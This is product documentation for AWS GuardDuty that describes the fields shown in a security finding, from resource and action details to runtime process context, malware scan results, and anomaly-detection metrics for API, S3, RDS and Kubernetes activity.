Finding details
In the Amazon GuardDuty console, you can view finding details in the finding summary section. Finding details vary based on the finding type.
There are two primary details that determine what kind of information is available for any
finding. The first is the resource type, which can be Instance
,
AccessKey
, S3Bucket
, S3Object
, Kubernetes cluster
, ECS
cluster
, Container
, RDSDBInstance
, or Lambda
.
The second detail
that determines finding information is Resource Role. Resource role can
be Target
for access keys, meaning the resource was the target of suspicious
activity. For instance type findings, resource role can also be Actor
, which
means that your resource was the actor carrying out suspicious activity. This topic
describes some of the commonly available details for findings.
Finding overview
A finding's Overview section contains the most basic identifying features of the finding, including the following information:
-
Account ID – The ID of the AWS account in which the activity took place that prompted GuardDuty to generate this finding.
-
Count – The number of times GuardDuty has aggregated an activity matching this pattern to this finding ID.
-
Created at – The time and date when this finding was first created. If this value differs from Updated at, it indicates that the activity has occurred multiple times and is an ongoing issue.
Note
Timestamps for findings in the GuardDuty console appear in your local time zone, while JSON exports and CLI outputs display timestamps in UTC.
-
Finding ID – A unique identifier for this finding type and set of parameters. New occurrences of activity matching this pattern will be aggregated to the same ID.
-
Finding type – A formatted string representing the type of activity that triggered the finding. For more information, see GuardDuty finding format.
-
Region – The AWS Region in which the finding was generated. For more information about supported Regions, see Regions and endpoints
-
Resource ID – The ID of the AWS resource against which the activity took place that prompted GuardDuty to generate this finding.
-
Scan ID – Applicable to findings when GuardDuty Malware Protection for EC2 is enabled, this is an identifier of the malware scan that runs on the EBS volumes attached to the potentially compromised EC2 instance or container workload. For more information, see Malware Protection for EC2 finding details.
-
Severity – A finding's assigned severity level of either High, Medium, or Low. For more information, see Severity levels for GuardDuty findings.
-
Updated at – The last time this finding was updated with new activity matching the pattern that prompted GuardDuty to generate this finding.
Resource
The Resource affected gives details about the AWS resource that was targeted by the initiating activity. The information available varies based on resource type and action type.
Resource role – The role of the AWS resource that initiated the finding. This value can be TARGET or ACTOR, and represents whether your resource was the target of the suspicious activity or the actor that performed the suspicious activity.
Resource type – The type of the affected resource. If multiple resources were involved, a finding can include multiple resources types. The resource types are Instance, AccessKey, S3Bucket, S3Object, KubernetesCluster, ECSCluster, Container, RDSDBInstance, and Lambda. Depending on the resource type, different finding details are available. Select a resource option tab to learn about the details available for that resource.
RDS database (DB) user details
Note
This section is applicable to findings when you enable the RDS Protection feature in GuardDuty. For more information, see RDS Protection in GuardDuty.
The GuardDuty finding provides the following user and authentication details of the potentially compromised database.
-
User – The user name used to make the anomalous login attempt.
-
Application – The application name used to make the anomalous login attempt.
-
Database – The name of the database instance involved in the anomalous login attempt.
-
SSL – The version of the Secure Socket Layer (SSL) used for the network.
-
Auth method – The authentication method used by the user involved in the finding.
Runtime Monitoring finding details
Note
These details may be available only if GuardDuty generates one of the Runtime Monitoring finding types.
This section contains the runtime details such as process details and any required context. Process details describe information about the observed process and runtime context describes any additional information about the potentially suspicious activity.
Process details
-
Name – The name of the process.
-
Executable path – The absolute path of the process executable file.
-
Executable SHA-256 – The
SHA256
hash of the process executable. -
Namespace PID – The process ID of the process in a secondary PID namespace other than the host level PID namespace. For processes inside a container, it is the process ID observed inside the container.
-
Present working directory – The present working directory of the process.
-
Process ID – The ID assigned to the process by operating system.
-
startTime – The time when the process started. This is in UTC date string format (
2023-03-22T19:37:20.168Z
). -
UUID – The unique ID assigned to the process by GuardDuty.
-
Parent UUID – The unique ID of the parent process. This ID is assigned to the parent process by GuardDuty.
-
User – The user that executed the process.
-
User ID – The ID of the user that executed the process.
-
Effective user ID – The effective user ID of the process at the time of the event.
-
Lineage – Information about the ancestors of the process.
-
Process ID – The ID assigned to the process by operating system.
-
UUID – The unique ID assigned to the process by GuardDuty.
-
Executable path – The absolute path of the process executable file.
-
Effective user ID – The effective user ID of the process at the time of the event.
-
Parent UUID – The unique ID of the parent process. This ID is assigned to the parent process by GuardDuty.
-
Start Time – The time when the process started.
-
Namespace PID – The process ID of the process in a secondary PID namespace other than the host level PID namespace. For processes inside a container, it is the process ID observed inside the container.
-
User ID – The user ID of the user that executed the process.
-
Name – Name of the process.
-
Runtime context
From the following fields, a generated finding may include only those fields that are relevant to the finding type.
-
Mount Source – The path on the host that is mounted by the container.
-
Mount Target – The path in the container that is mapped to the host directory.
-
Filesystem Type – Represents the type of the mounted filesystem.
-
Flags – Represents options that control the behavior of the event involved in this finding.
-
Modifying Process – Information about the process that created or modified a binary, script, or a library, inside a container at runtime.
-
Modified At – The timestamp at which the process created or modified a binary, script, or library inside a container at runtime. This field is in the UTC date string format (
2023-03-22T19:37:20.168Z
). -
Library Path – The path to the new library that was loaded.
-
LD Preload Value – The value of the
LD_PRELOAD
environment variable. -
Socket Path – The path to the Docker socket that was accessed.
-
Runc Binary Path – The path to the
runc
binary. -
Release Agent Path – The path to the
cgroup
release agent file. -
Command Line Example – The example of the command line involved in the potentially suspicious activity.
-
Tool Category – Category that the tool belongs to. Some of the examples are Backdoor Tool, Pentest Tool, Network Scanner, and Network Sniffer.
-
Tool Name – The name of the potentially suspicous tool.
-
Script Path – The path to the executed script that generated the finding.
-
Threat File Path – The suspicious path for which the threat intelligence details were found.
-
Service Name – The name of the security service that has been disabled.
EBS volumes scan details
Note
This section is applicable to findings when you turn on the GuardDuty-initiated malware scan in GuardDuty Malware Protection for EC2.
The EBS volumes scan provides details about the EBS volume attached to the potentially compromised EC2 instance or container workload.
-
Scan ID – The identifier of the malware scan.
-
Scan started at – The date and time when the malware scan started.
-
Scan completed at – The date and time when the malware scan completed.
-
Trigger Finding ID – The finding ID of the GuardDuty finding that initiated this malware scan.
-
Sources – The potential values are
Bitdefender
andAmazon
. -
Scan detections – The complete view of details and results for each malware scan.
-
Scanned item count – The total number of scanned files. It provides details such as
totalGb
,files
, andvolumes
. -
Threats detected item count – The total number of malicious
files
detected during the scan. -
Highest severity threat details – The details of the highest severity threat detected during the scan and the number of malicious files. It provides details such as
severity
,threatName
, andcount
. -
Threats detected by Name – The container element grouping threats of all severity levels. It provides details such as
itemCount
,uniqueThreatNameCount
,shortened
, andthreatNames
.
-
Malware Protection for EC2 finding details
Note
This section is applicable to findings when you turn on the GuardDuty-initiated malware scan in GuardDuty Malware Protection for EC2.
When the Malware Protection for EC2 scan detects malware, you can view the scan details by selecting the
corresponding finding on the Findings page in the https://console.aws.amazon.com/guardduty/
Note
The GuardDutyFindingDetected
tag specifies that the snapshots
contains malware.
The following information is available under the Threats detected section in the details panel.
-
Name – The name of the threat, obtained by grouping the files by detection.
-
Severity – The severity of the threat detected.
-
Hash – The SHA-256 of the file.
-
File path – The location of the malicious file in the EBS volume.
-
File name – The name of the file in which the threat was detected.
-
Volume ARN – The ARN of the scanned EBS volumes.
The following information is available under the Malware scan details section in the details panel.
-
Scan ID – The scan ID of the malware scan.
-
Scan started at – The date and time when the scan started.
-
Scan completed at – The date and time when the scan completed.
-
Files scanned – The total number of scanned files and directories.
-
Total GB scanned – The amount of storage scanned during the process.
-
Trigger finding ID – The finding ID of the GuardDuty finding that initiated this malware scan.
-
The following information is available under the Volume details section in the details panel.
-
Volume ARN – The Amazon Resource Name (ARN) of the volume.
-
SnapshotARN – The ARN of the snapshot of the EBS volume.
-
Status – The scan status of the volume, such as
Running
,Skipped
, andCompleted
. -
Encryption type – The type of encryption used to encrypt the volume. For example,
CMCMK
. -
Device name – The name of the device. For example,
/dev/xvda
.
-
Malware Protection for S3 finding details
The following malware scan details are available when you enable both GuardDuty and Malware Protection for S3 in your AWS account:
-
Threats – A list of threats detected during the malware scan.
For information about the number of threats that the finding can include, see Quotas in Malware Protection for S3.
-
Item path – A list of nested item path and hash details of the scanned S3 object.
-
Nested item path – Item path of the scanned S3 object where the threat was detected.
The value of this field is available only if the top-level object is an archive and if threat is detected inside an archive.
-
Hash – Hash of the threat detected in this finding.
-
-
Sources – The potential values are
Bitdefender
andAmazon
.
Action
A finding's Action gives details about the type of activity that triggered the finding. The information available varies based on action type.
Action type – The finding activity type. This value can be NETWORK_CONNECTION, PORT_PROBE, DNS_REQUEST, AWS_API_CALL, or RDS_LOGIN_ATTEMPT. The information available varies based on action type:
-
NETWORK_CONNECTION – Indicates that network traffic was exchanged between the identified EC2 instance and the remote host. This action type has the following additional information:
-
Connection direction – The network connection direction observed in the activity that prompted GuardDuty to generate the finding. The values can be one of the following:
-
INBOUND – Indicates that a remote host initiated a connection to a local port on the identified EC2 instance in your account.
-
OUTBOUND – Indicates that the identified EC2 instance initiated a connection to a remote host.
-
UNKNOWN – Indicates that GuardDuty could not determine the direction of the connection.
-
-
Protocol – The network connection protocol observed in the activity that prompted GuardDuty to generate the finding.
-
Local IP – The original source IP address of the traffic that triggered the finding. This info can be used to distinguish between the IP address of an intermediate layer through which traffic flows, and the original source IP address of the traffic that triggered the finding. For example the IP address of an EKS pod as opposed to the IP address of the instance on which the EKS pod is running.
-
Blocked – Indicates whether the targeted port is blocked.
-
-
PORT_PROBE – Indicates that a remote host probed the identified EC2 instance on multiple open ports. This action type has the following additional information:
-
Local IP – The original source IP address of the traffic that triggered the finding. This info can be used to distinguish between the IP address of an intermediate layer through which traffic flows, and the original source IP address of the traffic that triggered the finding. For example the IP address of an EKS pod as opposed to the IP address of the instance on which the EKS pod is running.
-
Blocked – Indicates whether the targeted port is blocked.
-
-
DNS_REQUEST – Indicates that the identified EC2 instance queried a domain name. This action type has the following additional information:
-
Protocol – The network connection protocol observed in the activity that prompted GuardDuty to generate the finding.
-
Blocked – Indicates whether the targeted port is blocked.
-
-
AWS_API_CALL – Indicates that an AWS API was invoked. This action type has the following additional information:
-
API – The name of the API operation that was invoked and thus prompted GuardDuty to generate this finding.
Note
These operations can also include non-API events captured by AWS CloudTrail. For more information, see Non-API events captured by CloudTrail.
-
User Agent – The user agent that made the API request. This value tells you whether the call was made from the AWS Management Console, an AWS service, the AWS SDKs, or the AWS CLI.
-
ERROR CODE – If the finding was triggered by a failed API call this displays the error code for that call.
-
Service name – The DNS name of the service that attempted to make the API call that triggered the finding.
-
-
RDS_LOGIN_ATTEMPT – Indicates that a login attempt was made to the potentially compromised database from a remote IP address.
-
IP address – The remote IP address that was used to make the potentially suspicious login attempt.
-
Actor or Target
A finding has an Actor section if the Resource
role was TARGET
. This indicates that your resource was
targeted by suspicious activity, and the Actor section contains
details about the entity that targeted your resource.
A finding has a Target section if the Resource
role was ACTOR
. This indicates that your resource was
involved in suspicious activity against a remote host, and this section contains
information on the IP or domain that your resource targeted.
The information available in the Actor or Target section can include the following:
-
Affiliated – Details about whether the AWS account of the remote API caller is related to your GuardDuty environment. If this value is
true
, the API caller is affiliated to your account in some manner; iffalse
, the API caller is from outside your environment. -
Remote Account ID – The account ID that owns the outbound IP address that was used to access the resource at the final network.
-
IP address – The IP address involved in the activity that prompted GuardDuty to generate the finding.
-
Location – Location information for the IP address involved in the activity that prompted GuardDuty to generate the finding.
-
Organization – ISP organization information of the IP address involved in the activity that prompted GuardDuty to generate the finding.
-
Port – The port number involved in the activity that prompted GuardDuty to generate the finding.
-
Domain – The domain involved in the activity that prompted GuardDuty to generate the finding.
-
Domain with suffix – The second- and top-level domain involved in an activity that potentially prompted GuardDuty to generate the finding. For a list of top-level and second-level domains, see public suffix list
.
Additional information
All findings have an Additional information section that can include the following information:
-
Threat list name – The name of the threat list that includes the IP address or the domain name involved in the activity that prompted GuardDuty to generate the finding.
-
Sample – A true or false value that indicates whether this is a sample finding.
-
Archived – A true or false value that indicates whether this is finding has been archived.
-
Unusual – Activity details that were not observed historically. These can include an unusual (previously not observed) user, location, time, bucket, login behavior, or ASN Org.
-
Unusual protocol – The network connection protocol involved in the activity that prompted GuardDuty to generate the finding.
-
Agent details – Details about the security agent that is currently deployed on the EKS cluster in your AWS account. This is only applicable to EKS Runtime Monitoring finding types.
-
Agent version – The version of the GuardDuty security agent.
-
Agent Id – The unique identifier of the GuardDuty security agent.
-
Evidence
Findings based on threat intelligence have an Evidence section that includes the following information:
-
Threat intelligence details – The name of the threat list on which the recognized
Threat name
appears. -
Threat name – The name of the malware family or other identifier that is associated with the threat.
-
Threat file SHA256 – SHA256 of the file that generated the finding.
Anomalous behavior
Findings types that end in AnomalousBehavior indicate that the finding was generated by the GuardDuty anomaly detection machine learning (ML) model. The ML model evaluates all API requests to your account and identifies anomalous events that are associated with tactics used by adversaries. The ML model tracks various factors of the API request, such as the user that made the request, the location the request was made from, and the specific API that was requested.
Details about which factors of the API request are unusual for the CloudTrail user identity
that invoked the request can be found in the finding details. The identities are defined
by the
CloudTrail userIdentity Element, and the possible values are: Root
,
IAMUser
, AssumedRole
, FederatedUser
,
AWSAccount
, or AWSService
.
In addition to the details available for all GuardDuty findings that are associated with API activity, AnomalousBehavior findings have additional details that are outlined in the following section. These details can be viewed in the console and are also available in the finding's JSON.
-
Anomalous APIs – A list of API requests that were invoked by the user identity in proximity to the primary API request associated with the finding. This pane further breaks down the details of the API event in the following ways.
-
The first API listed is the primary API, which is the API request associated with the highest-risk observed activity. This is the API that triggered the finding and correlates to the attack stage of the finding type. This is also the API that is detailed under the Action section in the console, and in the finding's JSON.
-
Any other APIs listed are additional anomalous APIs from the listed user identity observed in proximity to the primary API. If there is only one API on the list, the ML model did not identify any additional API requests from that user identity as anomalous.
-
The list of APIs is divided based on whether an API was successfully called, or if the API was unsuccessfully called, meaning an error response was received. The type of error response received is listed above each unsuccessfully called API. Possible error response types are:
access denied
,access denied exception
,auth failure
,instance limit exceeded
,invalid permission - duplicate
,invalid permission - not found
, andoperation not permitted
. -
APIs are categorized by their associated service.
Note
For more context, choose Historical APIs to view the details about the top APIs, to a maximum of 20, usually seen for both the user identity and all users within the account. The APIs are marked Rare (less than once a month), Infrequent (a few times a month), or Frequent (daily to weekly), depending on how often they are used within your account.
-
-
Unusual Behavior (Account) – This section gives additional details about the profiled behavior for your account. The information tracked in this panel includes:
-
ASN Org – The ASN Org that the anomalous API call was made from.
-
User Name – The name of the user that made the anomalous API call.
-
User Agent– The user agent used to make the anomalous API call. The user agent is the method used to make the call such as
aws-cli
orBotocore
. -
User Type – The type of user that made the anomalous API call. Possible values are
AWS_SERVICE
,ASSUMED_ROLE
,IAM_USER
, orROLE
. -
Bucket – The name of the S3 bucket that is being accessed.
-
-
Unusual Behavior (User Identity) – This section gives additional details about the profiled behavior for the User Identity involved with the finding. When a behavior isn't identified as historical, this means the GuardDuty ML model hasn't previously seen this user identity making this API call in this way within the training period. The following additional details about the User Identity are available:
-
ASN Org – The ASN Org the anomalous API call was made from.
-
User Agent– The user agent used to make the anomalous API call. The user agent is the method used to make the call such as
aws-cli
orBotocore
. -
Bucket – The name of the S3 bucket that is being accessed.
-
-
Unusual Behavior (Bucket) – This section gives additional details about the profiled behavior for the S3 bucket associated with the finding. When a behavior isn't identified as historical, this means the GuardDuty ML model hasn't previously seen API calls made to this bucket in this way within the training period. The information tracked in this section includes:
-
ASN Org – The ASN Org the anomalous API call was made from.
-
User Name – The name of the user that made the anomalous API call.
-
User Agent– The user agent used to make the anomalous API call. The user agent is the method used to make the call such as
aws-cli
orBotocore
. -
User Type – The type of user that made the anomalous API call. Possible values are
AWS_SERVICE
,ASSUMED_ROLE
,IAM_USER
, orROLE
.
Note
For more context on historical behaviors, choose Historical behavior in either Unusual behavior (Account), User ID, or Bucket section to view details about the expected behavior in your account for each of the following categories: Rare (less than once a month), Infrequent (a few times a month), or Frequent (daily to weekly), depending on how often they are used within your account.
-
-
Unusual Behavior (Database) – This section provides additional details about the profiled behavior for the database instance associated with the finding. When a behavior isn't identified as historical, it means that the GuardDuty ML model hasn't previously seen a login attempt made to this database instance in this way within the training period. The information tracked for this section in the finding panel includes:
-
User name – The user name used to make the anomalous login attempt.
-
ASN Org – The ASN Org that the anomalous login attempt was made from.
-
Application name – The application name used to make the anomalous login attempt.
-
Database name – The name of the database instance involved in the anomalous login attempt.
Note
The Historical behavior section provides more context on the previously observed User names, ASN Orgs, Application names, and Database names for the associated database. Each unique value has an associated count representing the number of times this value was observed in a successful login event.
-
-
Unusual behavior (Account Kubernetes cluster, Kubernetes namespace, and Kubernetes username) – This section provides additional details about the profiled behavior for the Kubernetes cluster and namespace associated with the finding. When a behavior isn't identified as historical, it means that the GuardDuty ML model hasn't previously observed this account, cluster, namespace, or username in this way. The information tracked for this section in the finding panel includes:
-
Username – The user that called the Kubernetes API associated with the finding.
-
Impersonated Username – The user being impersonated by
username
. -
Namespace – The Kubernetes namespace within the Amazon EKS cluster where the action occurred.
-
User Agent – The user agent associated with the Kubernetes API call. The user agent is the method used to make the call such as
kubectl
. -
API – The Kubernetes API called by
username
within the Amazon EKS cluster. -
ASN Information – The ASN information, such as Organization and ISP, associated with the IP address of the user making this call.
-
Day of week – The day of the week when the Kubernetes API call was made.
-
Permission1 – The Kubernetes verb and resource being checked for access to indicate whether or not the
username
can use the Kubernetes API. -
Service Account Name1 – The service account associated with the Kubernetes workload that provides an identity to the workload.
-
Registry1 – The container registry associated with the container image that is deployed in the Kubernetes workload.
-
Image1 – The container image, without the associated tags and digest, that is deployed in the Kubernetes workload.
-
Image Prefix Config1 – The image prefix with the container and workload security configuration enabled, such as
hostNetwork
orprivileged
, for the container using the image. -
Subject Name1 – The subjects, such as a
user
,group
, orserviceAccountName
that is bound to a reference role in aRoleBinding
orClusterRoleBinding
. -
Role Name1 – The name of the role that is involved in creation or modification of roles or the
roleBinding
API.
-
S3 volume-based anomalies
This section details the contextual information for S3 volume-based anomalies. The volume-based finding (Exfiltration:S3/AnomalousBehavior) monitors for unusual numbers of S3 API calls made to the S3 buckets by users, indicating potential data exfiltration. The following S3 API calls are monitored for volume-based anomaly detection.
-
GetObject
-
CopyObject.Read
-
SelectObjectContent
The following metrics would help to build a baseline of usual behavior when an IAM entity accesses an S3 bucket. To detect data exfiltration, volume-based anomaly detection finding evaluates all the activities against the usual behavioral baseline. Choose Historical behavior in the Unusual behavior (User Identity), Observed Volume (User Identity), and Observed Volume (Bucket) sections to view the following metrics, respectively.
-
Number of
s3-api-name
API calls invoked by the IAM user or IAM role (depends on which one was issued) associated with the affected S3 bucket over the past 24 hours. -
Number of
s3-api-name
API calls invoked by the IAM user or IAM role (depends on which one was issued) associated with all S3 buckets over the past 24 hours. -
Number of
s3-api-name
API calls across all IAM user or IAM role (depends on which one was issued) associated with the affected S3 bucket over the past 24 hours.
RDS login activity-based anomalies
This section details the count of login attempts performed by the unusual actor
and is grouped by the result of the login attempts. The RDS Protection finding types identify anomalous behavior by monitoring the login events for unusual patterns
of successfulLoginCount
, failedLoginCount
, and
incompleteConnectionCount
.
-
successfulLoginCount – This counter represents the sum of successful connections (correct combination of login attributes) made to the database instance by the unusual actor. Login attributes include user name, password, and database name.
-
failedLoginCount – This counter represents the sum of failed (unsuccessful) login attempts made to establish a connection to the database instance. This indicates that one or more attributes of the login combination, such as user name, password, or database name were incorrect.
-
incompleteConnectionCount – This counter represents the number of connection attempts that can't be classified as successful or failed. These connections are closed before the database provides a response. For example, port scanning where the database port is connected but no piece of information is sent to the database, or the connection was aborted before the login completed in a successful or failed attempt.